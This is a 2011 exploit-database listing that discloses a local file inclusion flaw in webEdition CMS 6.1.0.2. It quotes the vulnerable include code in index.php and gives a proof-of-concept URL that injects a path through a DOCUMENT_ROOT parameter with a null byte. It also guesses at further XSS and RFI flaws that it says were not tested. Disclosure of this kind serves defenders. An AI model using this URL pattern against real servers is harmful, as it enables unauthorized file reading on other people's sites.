[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

webEdition CMS Local File Inclusion Vulnerability

Author
eidelweiss
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15721
Category
web applications
Date add
29-03-2011
Platform
php
Software:   webEdition CMS (6.1.0.2)
Vendor:     http://www.webedition.org
Vuln Type:  Local File Inclusion
Download link:  http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
 
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
    
References: http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
    
    
===================================================================
  
    description:
webEdition Version 6.1.0.2
 
webEdition is a web content management system licensed under the GPL
For system requirements,
installation and upgrade details, see the files INSTALL and the informations available on our website
 
 http://www.webedition.org
 
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
----------------------------------
    Vulnerability code:
  
index.php
 
/*****************************************************************************
 * INITIALIZATION
 *****************************************************************************/
 
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
 
/*****************************************************************************
 * INCLUDES
 *****************************************************************************/
 
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
 
$ignore_browser = isset($_REQUEST["ignore_browser"]) &&  ($_REQUEST["ignore_browser"] === "true");
 
/*****************************************************************************
 
  
----------------------------------
  
    exploit & p0c
    
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
    or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
  
Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet.
    
====================================================================
    
    Nothing Impossible In This World Even Nobody`s Perfect



#  0day.today [2024-12-25]  #